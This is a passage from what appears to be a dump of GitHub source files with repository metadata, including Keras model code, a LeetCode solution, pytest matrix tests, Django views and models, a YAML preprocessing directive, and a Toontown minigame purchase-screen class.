x = GlobalAveragePooling2D()(x)
# x = Lambda(lambda x: K.max(x, axis=1, keepdims=False))(x) #out batch * height * channal
# x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(64, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(128, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(output_dim, activation='softmax')(x)
return x
def resnet(x, output_dim=8):
x = res_block(x, 8, 3)
x = res_block(x, 16, 3)
x = res_block(x, 32, 3)
x = res_block(x, 64, 3)
x = Flatten()(x)
x = Dropout(0.2)(x)
x = Dense(128, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(256, activation='relu')(x)
x = Dropout(0.2)(x)
x = Dense(output_dim, activation='softmax')(x)
return x
def model_creat(input_shape=(28, 28, 3), output_dim=8):
input_shape = input_shape
input_tensor = Input(shape=input_shape)
output_tensor = cnn(input_tensor, output_dim)
model = Model(inputs=[input_tensor], outputs=[output_tensor])
return model
if __name__ == '__main__':
model = model_creat(input_shape=(40, 216, 1), output_dim=50)
model.summary()
model.save('./model_struct/cnn_atten.h5')
|
[
"56808862+Grid-Gudx@users.noreply.github.com"
] |
56808862+Grid-Gudx@users.noreply.github.com
|
e680db738c872726585c93052f0caf654b612ac1
|
e7b7505c084e2c2608cbda472bc193d4a0153248
|
/LeetcodeNew/python2/LC_1432.py
|
84a5a75c9293ff45e21d69e289d5ee014eee0a6d
|
[] |
no_license
|
Taoge123/OptimizedLeetcode
|
8e5c1cd07904dfce1248bc3e3f960d2f48057a5d
|
3e50f6a936b98ad75c47d7c1719e69163c648235
|
refs/heads/master
| 2023-02-27T21:13:40.450089
| 2023-02-07T04:11:09
| 2023-02-07T04:11:09
| 170,044,224
| 9
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 927
|
py
|
class Solution:
def maxDiff(self, num: int) -> int:
num_string = str(num)
def change(src: str, dest: str, s: str):
return int(s.replace(src, dest))
# -----------------------------------------------------------
# digit replacement for maximum number
maxi = num
for char in num_string:
if char < '9':
maxi = change(char, '9', num_string)
break
# -----------------------------------------------------------
# digit replacement for minimum number
mini = num
if num_string[0] > '1':
# leading digit cannot be zero
mini = change(num_string[0], '1', num_string)
else:
for char in num_string[1:]:
if char > '1':
mini = change(char, '0', num_string)
break
return maxi - mini
|
[
"taocheng984@gmail.com"
] |
taocheng984@gmail.com
|
70b48dfafc9a4b13b1aa847ed8efe0c4f9c30f64
|
350ef2446bd8d4c23683a96673dfe0eb8ec232ea
|
/zjazd_4/Mathematica/tests/test_algebra.py
|
2e74683ebad360daca4e173f3226ba1d87469bb0
|
[] |
no_license
|
vorjat/PythonBootCamp
|
a6e758c13310bc9de5a76b2e67260971e5ad5807
|
d63dbc96b7d15ad6908828cf676f5fbc4a871c04
|
refs/heads/master
| 2020-03-31T02:51:24.230177
| 2018-12-02T15:44:07
| 2018-12-02T15:44:07
| 151,842,177
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 975
|
py
|
import pytest
from zjazd_4.Mathematica.algebra.matrices import add_matrices, sub_matrices
def test_add_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8, 9],
[10, 11, 12]
]
result = add_matrices(a, b)
assert result == [
[8, 10, 12],
[14, 16, 18]
]
def test_add_different_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8],
[10, 11]
]
with pytest.raises(ValueError):
add_matrices(a, b)
def test_sub_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8, 9],
[10, 11, 12]
]
result = sub_matrices(a, b)
assert result == [
[-6, -6, -6],
[-6, -6, -6]
]
def test_sub_different_matrices():
a = [
[1, 2, 3],
[4, 5, 6]
]
b = [
[7, 8],
[10, 11]
]
with pytest.raises(ValueError):
sub_matrices(a, b)
|
[
"przemyslaw.jarek@gmail.com"
] |
przemyslaw.jarek@gmail.com
|
c38ba3b864a46e77567726b65f31b71700254d4d
|
dcf076f397284659e0b4302bac33901b63e42319
|
/blog/views.py
|
aab81d370014d5c2ec86a9dc303b07680214b87c
|
[] |
no_license
|
ojudsonleo/Modle
|
7f6123c33013f62d72fa4fbfff3bfab00b96dd04
|
6cf0303023c910079f9a418af873934ada2b2286
|
refs/heads/main
| 2023-06-07T04:09:04.168910
| 2021-06-22T09:29:46
| 2021-06-22T09:29:46
| 378,587,839
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 362
|
py
|
from django.shortcuts import render
from django.views.generic import ListView, CreateView,DetailView,DeleteView
from .models import *
# def Blog(request):
# return render(request, "home.asp")
class Blog(ListView):
model = Post
template_name = "home.asp"
class ArticleDetailView(DeleteView):
model = Post
template_name = "article_detail.asp"
|
[
"ojudsonleo@gmail.com"
] |
ojudsonleo@gmail.com
|
8c7400085b75a92b05d0c7020226a30b186d9c51
|
af5ac397b5247b70ecd4c4d3c000eb8da3faf354
|
/custom_auth/models.py
|
49463b67f292af3111306923fa4fd4fdc1604560
|
[] |
no_license
|
rohithmada00/customAuthentication
|
023c978d5e588a7e4b36546884c7e1642672d54f
|
b9b4253d017c513bfb8af6d5d823ff76e1ed7b99
|
refs/heads/master
| 2022-12-05T15:39:33.958973
| 2020-08-30T12:45:37
| 2020-08-30T12:45:37
| 291,467,310
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,094
|
py
|
from django.db import models
from django.contrib.auth.models import PermissionsMixin
from django.contrib.auth.base_user import AbstractBaseUser
from .managers import CLUserManager
class CLUser(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(unique=True)
first_name = models.CharField(max_length=40, blank=True)
last_name = models.CharField(max_length=40, blank=True)
profile_image_url = models.URLField(null=True, blank=True)
is_staff = models.BooleanField(default=False)
is_active = models.BooleanField(default=True)
date_joined = models.DateTimeField(auto_now_add=True)
objects = CLUserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = []
def get_full_name(self):
'''
Returns the first_name plus the last_name, with a space in between.
'''
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name.strip()
def get_short_name(self):
'''
Returns the short name for the user.
'''
return self.first_name
|
[
"noreply@github.com"
] |
rohithmada00.noreply@github.com
|
192c6d5d6351a005d2e9a348a7e5589587dad35f
|
102c082395547af278da95d2334b1ff13f5cf5c0
|
/romeo/lib/romeo/directives/merge_lists.py
|
3d250dd80af958f3491ff275ef08a5dd038f6010
|
[
"Apache-2.0"
] |
permissive
|
c0ns0le/droned
|
ad2690edb2f8f26f380ae7c58ea657a76c49fccf
|
c4b6a53e384cdb200baba48f6256abc48e052aca
|
refs/heads/master
| 2021-04-15T09:45:37.547708
| 2014-02-25T20:51:52
| 2014-02-25T20:51:52
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,736
|
py
|
###############################################################################
# Copyright 2006 to the present, Orbitz Worldwide, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
'''
Created on Jun 6, 2011
@author: cbrinley
'''
import re
from romeo.directives import Directive,DirectiveException
class PreMergeLists(Directive):
'''This directive merges multiple lists into one list.
Recommended to be used with be with your parser's anchor
or tag system. here is a yaml example:
SERVER:
SERVICES: ${ROMEO.merge_lists *list1,*list2,*complex_type}
MYLIST: &list1
- item1
- item2
ANOTHER: &list2
- i3
- i4
output without this directive:
SERVER:
SERVICES: [ [item1,item2],[i3,i4],*complex_type]
output with this directive:
SERVER:
SERVICES: [item1,item2,i3,i4,{comple:type}]
'''
name = "merge_lists"
modes = ['pre']
repl_pattern = '["$<ROMEO.merge_lists %s>", %s]'
@classmethod
def init_kwargs(cls, preprocessor):
state = preprocessor.get_group_state("merge_lists")
return {"group_state":state}
def is_valid(self):
'''for this directive we have no extended validation.
we leave it up to the outer structured data parser
to determine if our arguments are valid.
'''
return
def apply(self):
'''pre side of this directive basically just
sets up some markers for the post side
of the directive. that's where the heavy
lifting is at.
#1 if we got this far we set state to true
so post side of directive can quickly
detect if we should continue processing.
'''
group_state = self.kwargs['group_state']
group_state[self.filename] = True #1
out = []
self.data.seek(0)
for line in self.get_lines():
m = self.used_pattern.search(line)
if not m:
out.append(line)
continue
args = ", ".join( self.extract_args(line[m.start():m.end()]) )
dirargs = ",".join( self.extract_args(line[m.start():m.end()]) )
repl = self.repl_pattern % (dirargs,args)
post_style_line = self.used_pattern.sub(repl,line,1)
out.append(post_style_line)
return "".join(out)
class PostMergeLists(Directive):
'''Main logic is in merge_lists(). see its doc for details
see PreMergLists for general directive notes.
'''
name = "merge_lists"
modes = ['post']
repl_pattern = '["$<ROMEO.merge_lists %s>", %s]'
@classmethod
def init_kwargs(cls, preprocessor):
state = preprocessor.get_group_state('merge_lists')
marker = re.compile("\$\<ROMEO\.%s.*\>" % cls.name )
return {'group_state':state,
'marker': marker,
}
def is_used(self):
'''traversing the whole dom could be quite expensive
depending on how many tags and imports were used
in raw source file. Our "pre" cousin has given us
a way to check on the cheap.
'''
group_state = self.kwargs['group_state']
return self.filename in group_state
def is_valid(self):
'''for this directive we have no extended validation.
we leave it up to the outer structured data parser
to determine if our arguments are valid.
'''
return
def apply(self):
self.used_pattern = self.kwargs['marker']
td = type(self.data)
if td == list: self.try_list_iterate(self.data)
if td == dict: self.try_dict_iterate(self.data)
del self.kwargs['group_state'][self.filename]
return self.data
def try_dict_iterate(self,data):
for v in data.values():
if type(v) == list:
self.try_list_iterate(v)
if type(v) == dict:
self.try_dict_iterate(v)
def try_list_iterate(self,data):
#check list value 0
#if its our guy merge it pluss next N lists
#remove first N+1 lists
#insert merged list as ord 0
#iterate over list
head = data[0]
if type(head) == str and self.used_pattern.match(head):
self.merge_lists(data)
for i in data:
if type(i) == list:
self.try_list_iterate(i)
if type(i) == dict:
self.try_dict_iterate(i)
def merge_lists(self,data):
'''#1 figure out how many lists we should merge
this is == to number of args passed to directive.
#2 our total list len (of lists) must be at least as
long as the number of args to our directive.
#3 skip the directive string and get the arguments
to the directive which should be the next <minlen>
items in our parent list.
#4 in case not all the items in our parent were
themselves lists. make em lists.
#5 flatten out this list of lists [[1],[2]] -> [1,2]
#6 reverse our list so we have [2,1] and push these
values onto the front of our list.
'''
err0 = 'merge_lists failed. '
err0 += 'there are not enough input lists. '
err0 += 'expected %s found %s.'
head = data[0]
args = self.extract_args(head) #1
minlen = len(args) + 1
actlen = len(data)
if actlen < minlen: #2
msg = err0 % (minlen,actlen)
raise DirectiveException(msg)
to_merge = data[1:minlen] #3
for i in range(len(to_merge)): #4
if type(to_merge[i]) != list:
to_merge[i] = [to_merge[i]]
i += 1
out = []
for l in to_merge: #5
for i in l:
out.append(i)
del data[:minlen]
out.reverse() #6
for i in out:
data.insert(0,i)
|
[
"justin.venus@orbitz.com"
] |
justin.venus@orbitz.com
|
da2506dbcd8bbd4a6af403ec8ad4fe380fbf367b
|
142c129a6712fb5b67415d2e3b2f18bf1fe83efe
|
/2019.03.21/회문1.py
|
30dc139546999ecd6088e70dda27ce9239ca35fb
|
[] |
no_license
|
ash92kr/TIL
|
03f0d4a664f7bbf641f23534ab6a4548dc68376c
|
0b0e42f5f7fca20143899efb3dd10907fa9890d5
|
refs/heads/master
| 2020-04-11T21:13:27.942570
| 2019-05-23T01:45:09
| 2019-05-23T01:45:09
| 162,098,959
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 724
|
py
|
import sys
sys.stdin = open("회문1_input.txt")
for tc in range(10):
N = int(input())
arr = [list(map(str, input())) for i in range(8)]
pal = 0
# 가로
for i in range(8):
for j in range(8-N+1):
flag = 1
for k in range(N//2):
if arr[i][j+k] != arr[i][j+N-1-k]:
flag = 0
break
if flag:
pal += 1
# 세로
for i in range(8):
for j in range(8-N+1):
flag = 1
for k in range(N//2):
if arr[j+k][i] != arr[j+N-1-k][i]:
flag = 0
if flag:
pal += 1
print("#{} {}".format(tc+1, pal))
|
[
"ash92kr@gmail.com"
] |
ash92kr@gmail.com
|
d4d8e4de325808fd6b97ad1ceddd2aa7572913b1
|
75f5f5429175ad50df86677f6ba1f09a0734d946
|
/jsonium/drivers/__init__.py
|
e70cddaefa2620eef3eb418df992347c3901a191
|
[
"MIT"
] |
permissive
|
pombredanne/jsonium
|
819c6c80bdcaf9e47a9788aa4c6fcfb46233c56a
|
3830945f7a4f8b29892158d5bfdcbf3426a21a24
|
refs/heads/master
| 2021-01-25T11:49:47.061555
| 2017-03-20T01:26:15
| 2017-03-20T01:26:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 189
|
py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from jsonium.drivers.file import FileDriver
from jsonium.drivers.memory import MemoryDriver
from jsonium.drivers.factory import DriverFactory
|
[
"ertugkeremoglu@gmail.com"
] |
ertugkeremoglu@gmail.com
|
cb7cf8108dc3d3578c84139188ed4476a67e35a8
|
6be1990abf99c85ef886b49dcea1824aabb648d3
|
/weixinofneolocal/weixinofneolocal/libs/PIL/ImageGL.py
|
279f3a32838f0e24f55fca3a9c41db50b3c92cff
|
[] |
no_license
|
neoguojing/cloudServer
|
b53ae205efe52cf0aea28dbb9e6c16c20caf991f
|
7c19101789b0c46474269e4c8fe00e92203e9cd7
|
refs/heads/master
| 2020-12-04T23:02:23.551479
| 2017-09-22T03:08:35
| 2017-09-22T03:08:35
| 67,382,984
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 487
|
py
|
#
# The Python Imaging Library.
# $Id$
#
# OpenGL pixmap/texture interface (requires imToolkit OpenGL extensions)
#
# History:
# 2003-09-13 fl Added
#
# Copyright (c) Secret Labs AB 2003.
#
# See the README file for information on usage and redistribution.
#
# #
# OpenGL pixmap/texture interface (requires imToolkit OpenGL
# extensions.)
# #
import _imaginggl
# #
# Texture factory.
class TextureFactory:
pass # overwritten by the _imaginggl module
from _imaginggl import *
|
[
"guojing_neo@163.com"
] |
guojing_neo@163.com
|
73f31707e7cdcddd3cec84f232c01508f2c17ff7
|
a949c2083ce543874481d2feb07f27bc1301d1f8
|
/django_project/blog/migrations/0002_post_image.py
|
02d2d4d94c700cec4fc48573787411674d9b58fa
|
[] |
no_license
|
rdx910/Projects
|
76ee94bc66a658049c15fd3feb3bed9924b504fc
|
9a6c863485010d34639fefc364e1c0903530d068
|
refs/heads/master
| 2021-01-16T12:31:24.189506
| 2020-06-07T17:52:33
| 2020-06-07T17:52:33
| 243,122,589
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 436
|
py
|
# Generated by Django 3.0.6 on 2020-06-04 21:16
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='post',
name='image',
field=models.ImageField(blank=True, null=True, upload_to='', verbose_name='blog/images'),
),
]
|
[
"noreply@github.com"
] |
rdx910.noreply@github.com
|
018f37ee6f1adac597034d8f4b414225d4c93b3a
|
ba0cbdae81c171bd4be7b12c0594de72bd6d625a
|
/MyToontown/Toontown2016/toontown/minigame/Purchase.py
|
478d19849772f06b8159fff787fc2746a0980349
|
[] |
no_license
|
sweep41/Toontown-2016
|
65985f198fa32a832e762fa9c59e59606d6a40a3
|
7732fb2c27001264e6dd652c057b3dc41f9c8a7d
|
refs/heads/master
| 2021-01-23T16:04:45.264205
| 2017-06-04T02:47:34
| 2017-06-04T02:47:34
| 93,279,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 35,143
|
py
|
from PurchaseBase import *
from otp.nametag.NametagFloat2d import *
from otp.nametag import NametagGlobals
from direct.task.Task import Task
from toontown.toon import ToonHead
from toontown.toonbase import ToontownTimer
from direct.gui import DirectGuiGlobals as DGG
from direct.directnotify import DirectNotifyGlobal
from direct.showbase.PythonUtil import Functor
from toontown.minigame import TravelGameGlobals
from toontown.distributed import DelayDelete
from toontown.toonbase import ToontownGlobals
import MinigameGlobals
COUNT_UP_RATE = 0.15
COUNT_UP_DURATION = 0.5
DELAY_BEFORE_COUNT_UP = 1.0
DELAY_AFTER_COUNT_UP = 1.0
COUNT_DOWN_RATE = 0.075
COUNT_DOWN_DURATION = 0.5
DELAY_AFTER_COUNT_DOWN = 0.0
DELAY_AFTER_CELEBRATE = 2.6
COUNT_SFX_MIN_DELAY = 0.034
COUNT_SFX_START_T = 0.079
OVERMAX_SFX_MIN_DELAY = 0.067
OVERMAX_SFX_START_T = 0.021
class Purchase(PurchaseBase):
notify = DirectNotifyGlobal.directNotify.newCategory('Purchase')
def __init__(self, toon, pointsArray, playerMoney, ids, states, remain, doneEvent, metagameRound = -1, votesArray = None):
PurchaseBase.__init__(self, toon, doneEvent)
self.ids = ids
self.pointsArray = pointsArray
self.playerMoney = playerMoney
self.states = states
self.remain = remain
self.tutorialMode = 0
self.metagameRound = metagameRound
self.votesArray = votesArray
self.voteMultiplier = 1
self.fsm.addState(State.State('reward', self.enterReward, self.exitReward, ['purchase']))
doneState = self.fsm.getStateNamed('done')
doneState.addTransition('reward')
self.unexpectedEventNames = []
self.unexpectedExits = []
self.setupUnexpectedExitHooks()
def load(self):
purchaseModels = loader.loadModel('phase_4/models/gui/purchase_gui')
PurchaseBase.load(self, purchaseModels)
interiorPhase = 3.5
self.bg = loader.loadModel('phase_%s/models/modules/toon_interior' % interiorPhase)
self.bg.setPos(0.0, 5.0, -1.0)
self.wt = self.bg.find('**/random_tc1_TI_wallpaper')
wallTex = loader.loadTexture('phase_%s/maps/wall_paper_a5.jpg' % interiorPhase)
self.wt.setTexture(wallTex, 100)
self.wt.setColorScale(0.8, 0.67, 0.549, 1.0)
self.bt = self.bg.find('**/random_tc1_TI_wallpaper_border')
wallTex = loader.loadTexture('phase_%s/maps/wall_paper_a5.jpg' % interiorPhase)
self.bt.setTexture(wallTex, 100)
self.bt.setColorScale(0.8, 0.67, 0.549, 1.0)
self.wb = self.bg.find('**/random_tc1_TI_wainscotting')
wainTex = loader.loadTexture('phase_%s/maps/wall_paper_b4.jpg' % interiorPhase)
self.wb.setTexture(wainTex, 100)
self.wb.setColorScale(0.473, 0.675, 0.488, 1.0)
self.playAgain = DirectButton(parent=self.frame, relief=None, scale=1.04, pos=(0.72, 0, -0.24), image=(purchaseModels.find('**/PurchScrn_BTN_UP'),
purchaseModels.find('**/PurchScrn_BTN_DN'),
purchaseModels.find('**/PurchScrn_BTN_RLVR'),
purchaseModels.find('**/PurchScrn_BTN_UP')), text=TTLocalizer.GagShopPlayAgain, text_fg=(0, 0.1, 0.7, 1), text_scale=0.05, text_pos=(0, 0.015, 0), image3_color=Vec4(0.6, 0.6, 0.6, 1), text3_fg=Vec4(0, 0, 0.4, 1), command=self.__handlePlayAgain)
self.backToPlayground = DirectButton(parent=self.frame, relief=None, scale=1.04, pos=(0.72, 0, -0.045), image=(purchaseModels.find('**/PurchScrn_BTN_UP'),
purchaseModels.find('**/PurchScrn_BTN_DN'),
purchaseModels.find('**/PurchScrn_BTN_RLVR'),
purchaseModels.find('**/PurchScrn_BTN_UP')), text=TTLocalizer.GagShopBackToPlayground, text_fg=(0, 0.1, 0.7, 1), text_scale=0.05, text_pos=(0, 0.015, 0), image3_color=Vec4(0.6, 0.6, 0.6, 1), text3_fg=Vec4(0, 0, 0.4, 1), command=self.__handleBackToPlayground)
self.timer = ToontownTimer.ToontownTimer()
self.timer.hide()
self.timer.posInTopRightCorner()
numAvs = 0
count = 0
localToonIndex = 0
for index in xrange(len(self.ids)):
avId = self.ids[index]
if avId == base.localAvatar.doId:
localToonIndex = index
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE:
numAvs = numAvs + 1
layoutList = (None,
(0,),
(0, 2),
(0, 1, 3),
(0, 1, 2, 3))
layout = layoutList[numAvs]
headFramePosList = (Vec3(0.105, 0, -0.384),
Vec3(0.105, 0, -0.776),
Vec3(0.85, 0, -0.555),
Vec3(-0.654, 0, -0.555))
AVID_INDEX = 0
LAYOUT_INDEX = 1
TOON_INDEX = 2
self.avInfoArray = [(base.localAvatar.doId, headFramePosList[0], localToonIndex)]
pos = 1
for index in xrange(len(self.ids)):
avId = self.ids[index]
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE:
if avId != base.localAvatar.doId:
if base.cr.doId2do.has_key(avId):
self.avInfoArray.append((avId, headFramePosList[layout[pos]], index))
pos = pos + 1
self.headFrames = []
for avInfo in self.avInfoArray:
av = base.cr.doId2do.get(avInfo[AVID_INDEX])
if av:
headFrame = PurchaseHeadFrame(av, purchaseModels)
headFrame.setAvatarState(self.states[avInfo[TOON_INDEX]])
headFrame.setPos(avInfo[LAYOUT_INDEX])
self.headFrames.append((avInfo[AVID_INDEX], headFrame))
purchaseModels.removeNode()
self.foreground = loader.loadModel('phase_3.5/models/modules/TT_A1')
self.foreground.setPos(12.5, -20, -5.5)
self.foreground.setHpr(180, 0, 0)
self.backgroundL = self.foreground.copyTo(hidden)
self.backgroundL.setPos(-12.5, -25, -5)
self.backgroundL.setHpr(180, 0, 0)
self.backgroundR = self.backgroundL.copyTo(hidden)
self.backgroundR.setPos(25, -25, -5)
self.backgroundR.setHpr(180, 0, 0)
streets = loader.loadModel('phase_3.5/models/modules/street_modules')
sidewalk = streets.find('**/street_sidewalk_40x40')
self.sidewalk = sidewalk.copyTo(hidden)
self.sidewalkR = sidewalk.copyTo(hidden)
self.sidewalkL = sidewalk.copyTo(hidden)
self.sidewalk.setPos(-20, -25, -5.5)
self.sidewalk.setColor(0.9, 0.6, 0.4)
self.sidewalkL.setPos(-40, -25, -5.5)
self.sidewalkL.setColor(0.9, 0.6, 0.4)
self.sidewalkR.setPos(0, -25, -5.5)
self.sidewalkR.setColor(0.9, 0.6, 0.4)
streets.removeNode()
doors = loader.loadModel('phase_4/models/modules/doors')
door = doors.find('**/door_single_square_ur_door')
self.door = door.copyTo(hidden)
self.door.setH(180)
self.door.setPos(0, -16.75, -5.5)
self.door.setScale(1.5, 1.5, 2.0)
self.door.setColor(1.0, 0.8, 0, 1)
doors.removeNode()
self.convertingVotesToBeansLabel = DirectLabel(text=TTLocalizer.TravelGameConvertingVotesToBeans, text_fg=VBase4(1, 1, 1, 1), relief=None, pos=(0.0, 0, -0.58), scale=0.075)
self.convertingVotesToBeansLabel.hide()
self.rewardDoubledJellybeanLabel = DirectLabel(text=TTLocalizer.PartyRewardDoubledJellybean, text_fg=(1.0, 0.125, 0.125, 1.0), text_shadow=(0, 0, 0, 1), relief=None, pos=(0.0, 0, -0.67), scale=0.08)
self.rewardDoubledJellybeanLabel.hide()
self.countSound = base.loader.loadSfx('phase_3.5/audio/sfx/tick_counter.ogg')
self.overMaxSound = base.loader.loadSfx('phase_3.5/audio/sfx/AV_collision.ogg')
self.celebrateSound = base.loader.loadSfx('phase_4/audio/sfx/MG_win.ogg')
return
def unload(self):
PurchaseBase.unload(self)
self.cleanupUnexpectedExitHooks()
self.bg.removeNode()
del self.bg
self.notify.debug('destroying head frames')
for headFrame in self.headFrames:
if not headFrame[1].isEmpty():
headFrame[1].reparentTo(hidden)
headFrame[1].destroy()
del self.headFrames
self.playAgain.destroy()
del self.playAgain
self.backToPlayground.destroy()
del self.backToPlayground
self.timer.stop()
self.timer.destroy()
del self.timer
for counter in self.counters:
counter.destroy()
del counter
del self.counters
for total in self.totalCounters:
total.destroy()
del total
del self.totalCounters
loader.unloadModel('phase_3.5/models/modules/TT_A1')
loader.unloadModel('phase_3.5/models/modules/street_modules')
loader.unloadModel('phase_4/models/modules/doors')
taskMgr.remove('countUpTask')
taskMgr.remove('countVotesUpTask')
taskMgr.remove('countDownTask')
taskMgr.remove('countVotesDownTask')
taskMgr.remove('celebrate')
taskMgr.remove('purchase-trans')
taskMgr.remove('delayAdd')
taskMgr.remove('delaySubtract')
self.foreground.removeNode()
del self.foreground
self.backgroundL.removeNode()
del self.backgroundL
self.backgroundR.removeNode()
del self.backgroundR
self.sidewalk.removeNode()
self.sidewalkL.removeNode()
self.sidewalkR.removeNode()
del self.sidewalk
del self.sidewalkL
del self.sidewalkR
self.door.removeNode()
del self.door
self.collisionFloor.removeNode()
del self.collisionFloor
del self.countSound
del self.celebrateSound
self.convertingVotesToBeansLabel.removeNode()
self.rewardDoubledJellybeanLabel.removeNode()
del self.convertingVotesToBeansLabel
del self.rewardDoubledJellybeanLabel
def showStatusText(self, text):
self.statusLabel['text'] = text
taskMgr.remove('resetStatusText')
taskMgr.doMethodLater(2.0, self.resetStatusText, 'resetStatusText')
def resetStatusText(self, task):
self.statusLabel['text'] = ''
return Task.done
def __handlePlayAgain(self):
for headFrame in self.headFrames:
headFrame[1].wrtReparentTo(aspect2d)
self.toon.inventory.reparentTo(hidden)
self.toon.inventory.hide()
taskMgr.remove('resetStatusText')
taskMgr.remove('showBrokeMsgTask')
self.statusLabel['text'] = TTLocalizer.GagShopWaitingOtherPlayers
messenger.send('purchasePlayAgain')
def handleDone(self, playAgain):
base.localAvatar.b_setParent(ToontownGlobals.SPHidden)
if playAgain:
self.doneStatus = {'loader': 'minigame',
'where': 'minigame'}
else:
self.doneStatus = {'loader': 'safeZoneLoader',
'where': 'playground'}
messenger.send(self.doneEvent)
def __handleBackToPlayground(self):
self.toon.inventory.reparentTo(hidden)
self.toon.inventory.hide()
messenger.send('purchaseBackToToontown')
def __timerExpired(self):
messenger.send('purchaseTimeout')
def findHeadFrame(self, id):
for headFrame in self.headFrames:
if headFrame[0] == id:
return headFrame[1]
return None
def __handleStateChange(self, playerStates):
self.states = playerStates
for avInfo in self.avInfoArray:
index = avInfo[2]
headFrame = self.findHeadFrame(avInfo[0])
state = self.states[index]
headFrame.setAvatarState(state)
def enter(self):
base.playMusic(self.music, looping=1, volume=0.8)
self.fsm.request('reward')
def enterReward(self):
numToons = 0
toonLayouts = ((2,),
(1, 3),
(0, 2, 4),
(0, 1, 3, 4))
toonPositions = (5.0,
1.75,
-0.25,
-1.75,
-5.0)
self.toons = []
self.toonsKeep = []
self.counters = []
self.totalCounters = []
camera.reparentTo(render)
camera.setPos(0, 16.0, 2.0)
camera.lookAt(0, 0, 0.75)
base.transitions.irisIn(0.4)
base.camLens.setMinFov(60/(4./3.))
base.setBackgroundColor(Vec4(0, 0.6, 1, 1))
self.title.reparentTo(aspect2d)
self.foreground.reparentTo(render)
self.backgroundL.reparentTo(render)
self.backgroundR.reparentTo(render)
self.sidewalk.reparentTo(render)
self.sidewalkL.reparentTo(render)
self.sidewalkR.reparentTo(render)
self.door.reparentTo(render)
size = 20
z = -2.5
floor = CollisionPolygon(Point3(-size, -size, z), Point3(size, -size, z), Point3(size, size, z), Point3(-size, size, z))
floor.setTangible(1)
floorNode = CollisionNode('collision_floor')
floorNode.addSolid(floor)
self.collisionFloor = render.attachNewNode(floorNode)
NametagGlobals.setOnscreenChatForced(1)
for index in xrange(len(self.ids)):
avId = self.ids[index]
if self.states[index] != PURCHASE_NO_CLIENT_STATE and self.states[index] != PURCHASE_DISCONNECTED_STATE and avId in base.cr.doId2do:
numToons += 1
toon = base.cr.doId2do[avId]
toon.stopSmooth()
self.toons.append(toon)
self.toonsKeep.append(DelayDelete.DelayDelete(toon, 'Purchase.enterReward'))
counter = DirectLabel(parent=hidden, relief=None, pos=(0.0, 0.0, 0.0), text=str(0), text_scale=0.2, text_fg=(0.95, 0.95, 0, 1), text_pos=(0, -0.1, 0), text_font=ToontownGlobals.getSignFont())
counter['image'] = DGG.getDefaultDialogGeom()
counter['image_scale'] = (0.33, 1, 0.33)
counter.setScale(0.5)
counter.count = 0
counter.max = self.pointsArray[index]
self.counters.append(counter)
money = self.playerMoney[index]
totalCounter = DirectLabel(parent=hidden, relief=None, pos=(0.0, 0.0, 0.0), text=str(money), text_scale=0.2, text_fg=(0.95, 0.95, 0, 1), text_pos=(0, -0.1, 0), text_font=ToontownGlobals.getSignFont(), image=self.jarImage)
totalCounter.setScale(0.5)
totalCounter.count = money
totalCounter.max = toon.getMaxMoney()
self.totalCounters.append(totalCounter)
self.accept('clientCleanup', self._handleClientCleanup)
pos = 0
toonLayout = toonLayouts[numToons - 1]
for toon in self.toons:
thisPos = toonPositions[toonLayout[pos]]
toon.setPos(Vec3(thisPos, 1.0, -2.5))
toon.setHpr(Vec3(0, 0, 0))
toon.setAnimState('neutral', 1)
toon.setShadowHeight(0)
if not toon.isDisabled():
toon.reparentTo(render)
self.counters[pos].setPos(thisPos * -0.17, 0, toon.getHeight() / 10 + 0.25)
self.counters[pos].reparentTo(aspect2d)
self.totalCounters[pos].setPos(thisPos * -0.17, 0, -0.825)
self.totalCounters[pos].reparentTo(aspect2d)
pos += 1
self.maxPoints = max(self.pointsArray)
if self.votesArray:
self.maxVotes = max(self.votesArray)
numToons = len(self.toons)
self.voteMultiplier = TravelGameGlobals.PercentOfVotesConverted[numToons] / 100.0
self.maxBeansFromVotes = int(self.voteMultiplier * self.maxVotes)
else:
self.maxVotes = 0
self.maxBeansFromVotes = 0
def reqCountUp(state):
self.countUp()
return Task.done
countUpDelay = DELAY_BEFORE_COUNT_UP
taskMgr.doMethodLater(countUpDelay, reqCountUp, 'countUpTask')
def reqCountDown(state):
self.countDown()
return Task.done
countDownDelay = countUpDelay + COUNT_UP_DURATION + DELAY_AFTER_COUNT_UP
taskMgr.doMethodLater(countDownDelay, reqCountDown, 'countDownTask')
def celebrate(task):
for counter in task.counters:
counter.hide()
winningPoints = max(task.pointsArray)
